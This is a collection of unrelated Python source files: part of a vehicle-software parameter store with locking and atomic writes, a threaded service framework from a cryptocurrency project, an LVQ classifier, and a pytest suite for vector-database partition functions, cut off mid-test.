"OpkrEnableLogger": [TxType.PERSISTENT],
"OpkrEnableGetoffAlert": [TxType.PERSISTENT],
"OpkrEnableLearner": [TxType.PERSISTENT],
"OpkrAutoResume": [TxType.PERSISTENT],
"OpkrAccelProfile": [TxType.PERSISTENT],
"OpkrAutoLanechangedelay": [TxType.PERSISTENT],
"OpkrRunMixplorer": [TxType.PERSISTENT],
"OpkrRunQuickedit": [TxType.PERSISTENT],
"OpkrRunSoftkey": [TxType.PERSISTENT],
"OpkrRunNavigation": [TxType.PERSISTENT],
"OpkrBootNavigation": [TxType.PERSISTENT],
"PutPrebuiltOn": [TxType.PERSISTENT],
"FingerprintIssuedFix": [TxType.PERSISTENT],
"LdwsCarFix": [TxType.PERSISTENT],
"LateralControlMethod": [TxType.PERSISTENT],
"CruiseStatemodeSelInit": [TxType.PERSISTENT],
"LateralControlPriority": [TxType.PERSISTENT],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def get_OpkrAutoShutdown(self):
cvt_dictionary = {
0:0,
1:1,
2:30,
3:60,
4:180,
5:300,
6:600,
7:1800,
8:3600,
9:10800,
10:18000,
}
nID = int( self.get("OpkrAutoShutdown") )
value = 0
try:
value = cvt_dictionary[nID]
except:
value = 0
return value
def get_OpkrAutoLanechangedelay(self):
cvt_dictionary = {
0:0.0,
1:0.1,
2:0.5,
3:1.0,
4:1.5,
5:2.0,
}
nID = int( self.get("OpkrAutoLanechangedelay") )
value = 0
try:
value = cvt_dictionary[nID]
except:
value = 0
return value
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
|
service.py
|
import queue
import sys
import threading
import traceback
from mushicoin import tools
from mushicoin.ntwrk.message import Order
class NoExceptionQueue(queue.Queue):
"""
In some cases, queue overflow is ignored. Necessary try, except blocks
make the code less readable. This is a special queue class that
simply ignores overflow.
"""
def __init__(self, maxsize=0):
queue.Queue.__init__(self, maxsize)
def put(self, item, block=True, timeout=None):
try:
queue.Queue.put(self, item, block, timeout)
except queue.Full:
pass
class Service:
"""
Service is a background job synchronizer.
It consists of an event loop, side threads and annotation helpers.
Event loop starts listening for upcoming events after registration.
If service is alive, all annotated methods are run in background
thread and results return depending on annotation type.
Side threads are executed repeatedly until service shuts down or
thread is forcefully closed from another thread. Each side-thread should
also check for infinite loops.
"""
INIT = 0
RUNNING = 1
STOPPED = 2
TERMINATED = 3
def __init__(self, name):
self.event_thread = threading.Thread()
self.into_service_queue = NoExceptionQueue(1000)
self.signals = {}
self.service_responses = {}
self.name = name
self.__state = None
self.execution_lock = threading.Lock()
self.__threads = {}
def register(self):
def service_target(service):
service.set_state(Service.RUNNING)
while service.get_state() == Service.RUNNING:
try:
order = service.into_service_queue.get(timeout=1)
if isinstance(order, Order):
result = Service.execute_order(service, order)
self.service_responses[order.id] = result
self.signals[order.id].set()
service.into_service_queue.task_done()
except TypeError:
service.set_state(Service.STOPPED)
self.service_responses[order.id] = True
self.signals[order.id].set()
except queue.Empty:
pass
def threaded_wrapper(func):
def insider(*args, **kwargs):
while self.__threads[func.__name__]["running"]:
try:
func(*args, **kwargs)
except Exception as e:
tools.log('Exception occurred at thread {}\n{}'.format(func.__name__, traceback.format_exc()))
return 0
return insider
cont = self.on_register()
if not cont:
tools.log("Service is not going to continue with registering!")
return False
# Start event loop
self.event_thread = threading.Thread(target=service_target, args=(self,), name=self.name)
self.event_thread.start()
# Start all side-threads
for clsMember in self.__class__.__dict__.values():
if hasattr(clsMember, "decorator") and clsMember.decorator == threaded.__name__:
new_thread = threading.Thread(target=threaded_wrapper(clsMember._original),
args=(self,),
name=clsMember._original.__name__)
self.__threads[clsMember._original.__name__] = {
"running": True,
"thread": new_thread
}
new_thread.start()
return True
# Lifecycle events
def on_register(self):
"""
Called just before registration starts.
:return: bool indicating whether registration should continue
"""
return True
def on_close(self):
"""
Called after everything is shut down.
:return: Irrelevant
"""
return True
def join(self):
"""
Join all side-threads and event loop in the end.
:return: None
"""
for thread_dict in self.__threads.values():
thread_dict["thread"].join()
self.into_service_queue.join()
# If join is called from the service instance, there is no need to join.
# Thread wants to destory itself
if threading.current_thread().name != self.event_thread.name:
self.event_thread.join()
def unregister(self, join=False):
"""
Disconnect the service background operations.
Close and join all side-threads and event loop.
:return: None
"""
self.execute('__shutdown_service__', True, args=(), kwargs={})
if join:
self.join()
self.on_close()
def execute(self, action, expect_result, args, kwargs):
"""
Execute an order that is triggered by annotated methods.
This method should be treated as private.
:param action: Action name
:param expect_result: Whether to wait for result of action
:param args: Argument list for method
:param kwargs: Keyword argument list for method
:return: result of action or None
"""
if self.get_state() != Service.RUNNING:
return None
result = None
new_order = Order(action, args, kwargs)
# This is already event thread and someone called a synced function.
# We can run it now.
if threading.current_thread().name == self.event_thread.name:
result = Service.execute_order(self, new_order)
return result
self.signals[new_order.id] = threading.Event()
self.into_service_queue.put(new_order)
if expect_result:
try:
if self.signals[new_order.id].wait():
response = self.service_responses[new_order.id]
del self.signals[new_order.id]
del self.service_responses[new_order.id]
result = response
else:
tools.log('Service wait timed out', self.__class__.__name__)
except:
tools.log(sys.exc_info())
pass
return result
@staticmethod
def execute_order(service, order):
"""
Directly executes the order on service instance.
Makes no thread checks, no synchronization attempts.
:param service: Service instance
:param order: Order object
:return: result of the execution
"""
result = False
if order.action == '__close_threaded__':
result = True
service.__threads[order.args[0]]["running"] = False
elif order.action == '__shutdown_service__':
result = True
service.set_state(Service.STOPPED)
elif hasattr(service, order.action):
try:
result = getattr(service, order.action)._original(service, *order.args, **order.kwargs)
except:
result = None
tools.log(sys.exc_info())
return result
def get_state(self): # () -> (INIT|RUNNING|STOPPED|TERMINATED)
"""
:return: State of the service
"""
return self.__state
def set_state(self, state): # (INIT|RUNNING|STOPPED|TERMINATED) -> ()
"""
Set the current state of the service.
This should never be used outside of the service.
Treat as private method.
:param state: New state
:return: None
"""
if state == Service.STOPPED or state == Service.TERMINATED:
tools.log('{} got stopped'.format(self.__class__.__name__))
for thread_name in self.__threads.keys():
self.__threads[thread_name]["running"] = False
self.__state = state
def close_threaded(self):
"""
Close current side-thread.
:return: None
"""
thread_name = threading.current_thread().name
self.execute(action='__close_threaded__',
expect_result=True,
args=(thread_name,),
kwargs={})
def threaded_running(self):
"""
Should only be used by side-threads to check if it is
still alive. Any inner loop can be cancelled.
:return: is current side-thread should continue to run
"""
thread_name = threading.current_thread().name
is_service_running = (self.get_state() == Service.RUNNING)
try:
return self.__threads[thread_name]["running"] and is_service_running
except:
return True
def sync(func):
"""
Decorator for any service method that needs to run in the event loop.
Results return after execution.
:param func: Function to be decorated
:return: Decorated version of function
"""
def wrapper(self, *args, **kwargs):
return self.execute(func.__name__, True, args=args, kwargs=kwargs)
wrapper._original = func
wrapper.thread_safe = True
return wrapper
def async(func):
"""
Decorator for any service method that needs to run in the event loop.
Results do not return after execution.
:param func: Function to be decorated
:return: Decorated version of function
"""
def wrapper(self, *args, **kwargs):
return self.execute(func.__name__, False, args=args, kwargs=kwargs)
wrapper._original = func
wrapper.thread_safe = True
return wrapper
def threaded(func):
"""
This is just a marker decorator. It removes all the functionality but
adds a decorator marker so that it can be registered as a new thread
Given method assumed to be running indefinitely until a closing signal is given.
That's why threaded methods should define their own while or for loop. Instead,
signal close by using an if condition at the start of the method.
Close signal can be given out by Service.close_threaded()
:param func: Function to be marked
:return: useless function that is marked
"""
def wrapper(self, *args, **kwargs):
import warnings
warnings.warn('Threaded methods should not be executed directly.')
return None
wrapper.decorator = threaded.__name__
wrapper._original = func
return wrapper
locks = {}
class LockException(Exception):
def __init__(self, message):
Exception.__init__(self, message)
def lockit(lock_name, timeout=-1):
def _lockit(func):
"""
Decorator for any service method that needs to run in the event loop.
Results return after execution.
:param func: Function to be decorated
:return: Decorated version of function
"""
def wrapper(self, *args, **kwargs):
global locks
if '__lock_{}__'.format(lock_name) in locks.keys():
mylock = locks['__lock_{}__'.format(lock_name)]
else:
mylock = threading.RLock()
locks['__lock_{}__'.format(lock_name)] = mylock
is_acquired = mylock.acquire(timeout=timeout)
if is_acquired:
result = func(self, *args, **kwargs)
else:
raise LockException('Lock named {} could not be acquired in the given time'.format(lock_name))
mylock.release()
return result
wrapper._original = func
wrapper.thread_safe = True
wrapper.__name__ = func.__name__
return wrapper
return _lockit
|
lvq.py
|
# LVQ for the Ionosphere Dataset
from random import seed
from random import randrange
from random import shuffle
from csv import reader
from math import sqrt
import numpy as np
import os
import sys
import time
import threading
import itertools
class LVQ:
codebooks = list()
n_codebooks = 0
data_train = list()
data_test = list()
is_loading = False
# instance attribute
def __init__(self):
pass
def set_data(self, dataset, t):
for i in range(len(dataset[0])-1):
self.str_column_to_float(dataset, i)
# self.min_max_normalize(dataset, i, 0, 255)
# convert class column to integers
self.str_column_to_int(dataset, -1)
# shuffle(dataset)
if t == 'train':
self.data_train = dataset
if self.n_codebooks > 0:
self.random_codebooks()
elif t == 'test':
self.data_test = dataset
else:
print("Hanya menerima string 'train' atau 'test' untuk tipe dataset")
# Load a CSV file
def load_csv(self, filename, t):
dataset = list()
with open(filename, 'r') as file:
csv_reader = reader(file)
for row in csv_reader:
if not row:
continue
dataset.append(row)
for i in range(len(dataset[0])-1):
self.str_column_to_float(dataset, i)
# self.min_max_normalize(dataset, i, 0, 255)
# convert class column to integers
self.str_column_to_int(dataset, -1)
# shuffle(dataset)
if t == 'train':
self.data_train = dataset
if self.n_codebooks > 0:
self.random_codebooks()
elif t == 'test':
self.data_test = dataset
else:
print("Hanya menerima string 'train' atau 'test' untuk tipe dataset")
def set_n_codebooks(self, n):
self.n_codebooks = n
# Convert string column to float
def str_column_to_float(self, dataset, column):
for row in dataset:
row[column] = float(row[column].strip())
# Convert string column to integer
def str_column_to_int(self, dataset, column):
for row in dataset:
row[column] = int(row[column])
# Normalization with min-max method
def min_max_normalize(self, dataset, column, min=0, max=100):
for i in range(len(dataset)):
dataset[i][column] = round((dataset[i][column] - min) / (max - min), 6)
# calculate the Euclidean distance between two vectors
def euclidean_distance(self, row1, row2):
distance = 0.0
for i in range(len(row1)-1):
distance += (row1[i] - row2[i])**2
return sqrt(distance)
# Locate the best matching unit
def get_best_matching_unit(self, codebooks, test_row):
distances = list()
for codebook in codebooks:
dist = self.euclidean_distance(codebook, test_row)
distances.append((codebook, dist))
distances.sort(key=lambda tup: tup[1])
return distances[0][0]
# Make a prediction with codebook vectors
def predict(self, codebooks, test_row):
bmu = self.get_best_matching_unit(codebooks, test_row)
return bmu[-1]
# Create a random codebook vector
def random_codebooks(self):
finded_class = list()
codebook = list()
for row in self.data_train:
if (row[-1] in finded_class) == False:
finded_class.append(row[-1])
codebook.append(row)
if len(finded_class) == self.n_codebooks:
break
self.codebooks = codebook
# Train a set of codebook vectors
def train_codebooks(self, lrate, epochs):
if len(self.data_train) == 0:
print("Data latih belum di input!")
return
# Loading animation
self.is_loading = True
thread1 = threading.Thread(target=self.animate)
thread1.start()
for epoch in range(epochs):
rate = lrate * 0.1
for row in self.data_train:
bmu = self.get_best_matching_unit(self.codebooks, row)
for i in range(len(row)-1):
error = row[i] - bmu[i]
if bmu[-1] == row[-1]:
bmu[i] += rate * error
else:
bmu[i] -= rate * error
self.is_loading = False
print("\nProses training selesai")
# Calculate accuracy percentage
def accuracy_metric(self, t='train'):
correct = 0
if t == 'train':
data = self.data_train
elif t == 'test':
data = self.data_test
else:
print("Hanya menerima string 'train' atau 'test' untuk tipe dataset")
return
actual = [row[-1] for row in data]
predictions = list()
for row in data:
output = self.predict(self.codebooks, row)
predictions.append(output)
wrong_data = list()
for i in range(len(actual)):
if actual[i] == predictions[i]:
correct += 1
else:
wrong_data.append(i+1)
return (correct / float(len(actual)) * 100.0), wrong_data, actual, predictions
def write_codebooks(self, name):
filename = name
f = open(filename, 'w')
for codebook in self.codebooks:
for val in codebook:
f.write(str(val) + ', ')
f.write('\n')
f.close()
def animate(self):
for c in itertools.cycle(['|', '/', '-', '\\']):
if not self.is_loading:
sys.stdout.write('\r')
sys.stdout.flush()
break
sys.stdout.write('\rMenunggu proses pembelajaran ' + c)
sys.stdout.flush()
time.sleep(0.1)
print("\n")
|
test_partition.py
|
import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils.utils import *
from common.constants import *
from common.common_type import CaseLabel
TIMEOUT = 120
class TestCreateBase:
"""
******************************************************************
The following cases are used to test `create_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_a(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(600)
def test_create_partition_limit(self, connect, collection, args):
'''
target: test create partitions, check status returned
method: call function: create_partition for 4097 times
expected: exception raised
'''
threads_num = 8
threads = []
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
def create(connect, threads_num):
for i in range(max_partition_num // threads_num):
tag_tmp = gen_unique_str()
connect.create_partition(collection, tag_tmp)
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = threading.Thread(target=create, args=(m, threads_num))
threads.append(t)
t.start()
for t in threads:
t.join()
tag_tmp = gen_unique_str()
with pytest.raises(Exception) as e:
connect.create_partition(collection, tag_tmp)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_repeat(self, connect, collection):
'''
target: test create partition, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(collection, default_tag)
try:
connect.create_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: partition name = %s already exists" % default_tag
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_collection_not_existed(self, connect):
'''
target: test create partition, its owner collection name not existed in db, check status returned
method: call function: create_partition
expected: status not ok
'''
collection_name = gen_unique_str()
try:
connect.create_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "create partition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_name_name_none(self, connect, collection):
'''
target: test create partition, tag name set None, check status returned
method: call function: create_partition
expected: status ok
'''
tag_name = None
try:
connect.create_partition(collection, tag_name)
except Exception as e:
assert e.args[0] == "`partition_name` value None is illegal"
@pytest.mark.tags(CaseLabel.L0)
def test_create_different_partition_names(self, connect, collection):
"""
target: test create partition twice with different names
method: call function: create_partition, and again
expected: status ok
"""
connect.create_partition(collection, default_tag)
tag_name = gen_unique_str()
connect.create_partition(collection, tag_name)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, tag_name, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_default(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == len(ids)
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_with_tag_not_existed(self, connect, collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status not ok
'''
tag_new = "tag_new"
connect.create_partition(collection, default_tag)
ids = [i for i in range(default_nb)]
try:
connect.insert(collection, default_entities, partition_name=tag_new)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % tag_new
@pytest.mark.tags(CaseLabel.L0)
def test_create_partition_insert_same_tags(self, connect, id_collection):
'''
target: test create partition, and insert vectors, check status returned
method: call function: create_partition
expected: status ok
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
ids = [(i+default_nb) for i in range(default_nb)]
new_result = connect.insert(id_collection, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([id_collection])
res = connect.get_collection_stats(id_collection)
assert res["row_count"] == default_nb * 2
@pytest.mark.tags(CaseLabel.L2)
def test_create_partition_insert_same_tags_two_collections(self, connect, collection):
'''
target: test create two partitions, and insert vectors with the same tag to each collection, check status returned
method: call function: create_partition
expected: status ok, collection length is correct
'''
connect.create_partition(collection, default_tag)
collection_new = gen_unique_str()
connect.create_collection(collection_new, default_fields)
connect.create_partition(collection_new, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
new_result = connect.insert(collection_new, default_entities, partition_name=default_tag)
assert len(new_result.primary_keys) == default_nb
connect.flush([collection, collection_new])
res = connect.get_collection_stats(collection)
assert res["row_count"] == default_nb
res = connect.get_collection_stats(collection_new)
assert res["row_count"] == default_nb
class TestShowBase:
"""
******************************************************************
The following cases are used to test `list_partitions` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partition first, then call function: list_partitions
expected: status ok, partition correct
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_list_partitions_no_partition(self, connect, collection):
'''
target: test show partitions with collection name, check status and partitions returned
method: call function: list_partitions
expected: status ok, partitions correct
'''
res = connect.list_partitions(collection)
assert compare_list_elements(res, ['_default'])
@pytest.mark.tags(CaseLabel.L0)
def test_show_multi_partitions(self, connect, collection):
'''
target: test show partitions, check status and partitions returned
method: create partitions first, then call function: list_partitions
expected: status ok, partitions correct
'''
tag_new = gen_unique_str()
connect.create_partition(collection, default_tag)
connect.create_partition(collection, tag_new)
res = connect.list_partitions(collection)
assert compare_list_elements(res, [default_tag, tag_new, '_default'])
class TestHasBase:
"""
******************************************************************
The following cases are used to test `has_partition` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_a(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
connect.create_partition(collection, default_tag)
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_multi_partitions(self, connect, collection):
'''
target: test has_partition, check status and result
method: create partition first, then call function: has_partition
expected: status ok, result true
'''
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
connect.create_partition(collection, tag_name)
for tag_name in [default_tag, "tag_new", "tag_new_new"]:
res = connect.has_partition(collection, tag_name)
assert res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_name_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with tag not existed
expected: status ok, result empty
'''
res = connect.has_partition(collection, default_tag)
logging.getLogger().info(res)
assert not res
@pytest.mark.tags(CaseLabel.L0)
def test_has_partition_collection_not_existed(self, connect, collection):
'''
target: test has_partition, check status and result
method: then call function: has_partition, with collection not existed
expected: status not ok
'''
collection_name = "not_existed_collection"
try:
connect.has_partition(collection_name, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "HasPartition failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test has partition, with invalid tag name, check status returned
method: call function: has_partition
expected: status ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.has_partition(collection, tag_name)
class TestDropBase:
"""
******************************************************************
The following cases are used to test `drop_partition` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_a(self, connect, collection):
'''
target: test drop partition, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
res1 = connect.list_partitions(collection)
assert default_tag in res1
connect.drop_partition(collection, default_tag)
res2 = connect.list_partitions(collection)
assert default_tag not in res2
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed(self, connect, collection):
'''
target: test drop partition, but tag not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_tag = "new_tag"
try:
connect.drop_partition(collection, new_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % new_tag
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_name_not_existed_A(self, connect, collection):
'''
target: test drop partition, but collection not existed
method: create partitions first, then call function: drop_partition
expected: status not ok
'''
connect.create_partition(collection, default_tag)
new_collection = gen_unique_str()
try:
connect.drop_partition(new_collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: can't find collection: %s" % new_collection
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_repeatedly(self, connect, collection):
'''
target: test drop partition twice, check status and partition if existed
method: create partitions first, then call function: drop_partition
expected: status not ok, no partitions in db
'''
connect.create_partition(collection, default_tag)
connect.drop_partition(collection, default_tag)
time.sleep(2)
try:
connect.drop_partition(collection, default_tag)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DropPartition failed: partition %s does not exist" % default_tag
tag_list = connect.list_partitions(collection)
assert default_tag not in tag_list
@pytest.mark.tags(CaseLabel.L0)
def test_drop_partition_create(self, connect, collection):
'''
target: test drop partition, and create again, check status
method: create partitions first, then call function: drop_partition, create_partition
expected: status not ok, partition in db
'''
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
connect.drop_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), ['_default'])
time.sleep(2)
connect.create_partition(collection, default_tag)
assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])
class TestNameInvalid(object):
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test drop partition, with invalid collection name, check status returned
method: call function: drop_partition
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection_name, default_tag)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_partition_with_invalid_tag_name(self, connect, collection, get_tag_name):
'''
target: test drop partition, with invalid tag name, check status returned
method: call function: drop_partition
expected: status not ok
'''
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.drop_partition(collection, tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_partitions_with_invalid_collection_name(self, connect, collection, get_collection_name):
'''
target: test show partitions, with invalid collection name, check status returned
method: call function: list_partitions
expected: status not ok
'''
collection_name = get_collection_name
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
connect.list_partitions(collection_name)
class TestNewCase(object):
@pytest.mark.tags(CaseLabel.L0)
def test_drop_default_partition_A(self, connect, collection):
'''
target: test drop partition of default, check status returned
method: call function: drop_partition
expected: status not ok
'''
try:
connect.drop_partition(collection, partition_name='_default')
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
